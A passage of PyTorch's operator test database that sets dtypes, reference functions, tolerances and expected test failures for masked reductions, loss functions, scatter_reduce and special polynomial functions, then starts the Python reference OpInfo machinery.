sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), ReductionOpInfo( '_masked.amax', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amax), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.amin', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amin), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmax', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmax DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmin', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmin DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.mean', ref=reference_reduction_numpy(np.mean) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), skips=( DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_duplicate_values', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_small_input', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), OpInfo( '_masked.median', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_masked_softmax, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.norm', identity=0, method_variant=None, nan_policy='propagate', supports_out=False, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # torch.jit.frontend.NotSupportedError: Compiled functions # can't take variable number of arguments or use # keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_norm, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.var', ref=reference_reduction_numpy(np.var) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02), torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), ReductionOpInfo( '_masked.std', ref=reference_reduction_numpy(np.std) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), OpInfo( '_masked.softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.log_softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.softmin', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.normalize', method_variant=None, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_normalize, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Prexisting issue with linalg.vector_norm DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # RuntimeError: "clamp_min_cpu" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestMasked', 'test_reference_masked', device_type='cpu', dtypes=[torch.half]), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo( "nn.functional.ctc_loss", ref=_NOTHING, dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_ctc_loss, skips=( # https://github.com/pytorch/pytorch/issues/67462 # torch.autograd.gradcheck.GradcheckError: Jacobian mismatch for output 0 with respect to input 0 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_grad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), # Operation calls data_ptr() somewhere; needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), ), OpInfo( "nn.functional.cosine_embedding_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_embedding_loss, ), OpInfo( "nn.functional.nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_nll_loss, supports_forward_ad=True, assert_jit_shape_analysis=True, skips=( # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0, i1): # return torch.nn.functional.nll_loss(i0, i1, weight=tensor([8.4784, 1.7658, 4.3228], dtype=torch.float32)) # ~~~~~~ <--- HERE DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.gaussian_nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_gaussian_nll_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ) ), OpInfo( "nn.functional.hinge_embedding_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hinge_embedding_loss, error_inputs_func=error_inputs_hinge_embedding_loss, reference_inputs_func=reference_inputs_hinge_embedding_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ) ), OpInfo( "nn.functional.huber_loss", aten_backward_name='huber_loss_backward', ref=_NOTHING, dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, sample_inputs_func=sample_inputs_huber_loss, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ) ), OpInfo( "nn.functional.pdist", ref=reference_pdist, sample_inputs_func=sample_inputs_pdist, dtypes=floating_types(), supports_out=False, supports_gradgrad=False), OpInfo( "nn.functional.poisson_nll_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_poisson_nll_loss, ), OpInfo( "argsort", dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_argsort, supports_out=False, supports_autograd=False, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), OpInfo( "repeat_interleave", dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_repeat_interleave, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pairwise_distance", ref=lambda a, b, p=2.0, eps=1e-6, keepdim=False: ( np.sum(np.abs(a - b + eps) ** p, axis=-1, keepdims=keepdim) ** (1 / p) ), sample_inputs_func=sample_inputs_pairwise_distance, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo( "nn.functional.pixel_shuffle", sample_inputs_func=sample_inputs_pixel_shuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pixel_unshuffle", sample_inputs_func=sample_inputs_pixel_unshuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.kl_div", sample_inputs_func=sample_inputs_kl_div, dtypes=floating_types_and(torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), backward_dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), dtypesIfCUDA=floating_types_and( torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64 ), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), supports_out=False, check_batched_grad=False, supports_forward_ad=True, skips=( # See https://github.com/pytorch/pytorch/issues/65466 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", ), ), ), OpInfo( "diagflat", ref=lambda input, offset=0: np.diagflat(input, k=offset), sample_inputs_func=sample_inputs_diagflat, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( 'scatter_reduce', variant_test_name='sum', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='prod', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='mean', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amin', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amax', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), UnaryUfuncInfo( 'special.bessel_j0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_j1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_h', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_he', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.laguerre_polynomial_l', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.legendre_polynomial_p', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), ] # NOTE [Python References] # Python References emulate existing PyTorch operations, but can ultimately # be expressed in terms of "primitive" operations from torch._prims. # # These references are experimental. # See https://dev-discuss.pytorch.org/t/tracing-with-primitives-update-0/577 # for additional context. # # Python Reference OpInfos should be added to the python_ref_db list below. # Tests can opt-into running on these references by including # that list in the Sequence they pass to the @ops decorator. # # When a Python Reference OpInfo is constructed a pointer to an # existing OpInfo must be provided using the torch_opinfo_name kwarg. # The existing OpInfo with that name and no variant will be found # to inherit from. # # Instead of just inheriting the existing OpInfo's metadata, the # Python Reference OpInfos inherit the existing OpInfo's # construction arguments. These arguments can be overridden # by adding kwargs to the constructor. def _find_referenced_opinfo(referenced_name): ''' Finds the OpInfo with the given name that has no variant name. ''' for opinfo in op_db: if opinfo.name == referenced_name and opinfo.variant_test_name == '': return opinfo def _inherit_constructor_args(name, op, inherited, overrides): # inherits metadata common_kwargs = { 'name': name, 'op': op, 'aliases': None, # TODO add a check for alias coverage 'method_variant': None, 'inplace_variant': None, # TODO: add a check for inplace coverage 'supports_scripting': False, } # Acquires inherited kwargs kwargs = inherited.copy() # Fixes metadata if 'kwargs' in kwargs: kwargs.update(kwargs['kwargs']) del kwargs['kwargs'] if 'self' in kwargs: del kwargs['self'] if '__class__' in kwargs: del kwargs['__class__'] if 'skips' in kwargs: del kwargs['skips'] if 'decorators' in kwargs: del kwargs['decorators'] # Overrides metadata kwargs.update(common_kwargs) kwargs.update(overrides) kwargs['supports_autograd'] = False kwargs['supports_gradgrad'] = False kwargs['supports_fwgrad_bwgrad'] = False kwargs['supports_inplace_autograd'] = False kwargs['supports_forward_ad'] = False return kwargs class PythonRefInfo(OpInfo): ''' An OpInfo for a Python reference of an OpInfo base class operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo validate_view_consistency=True, **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = 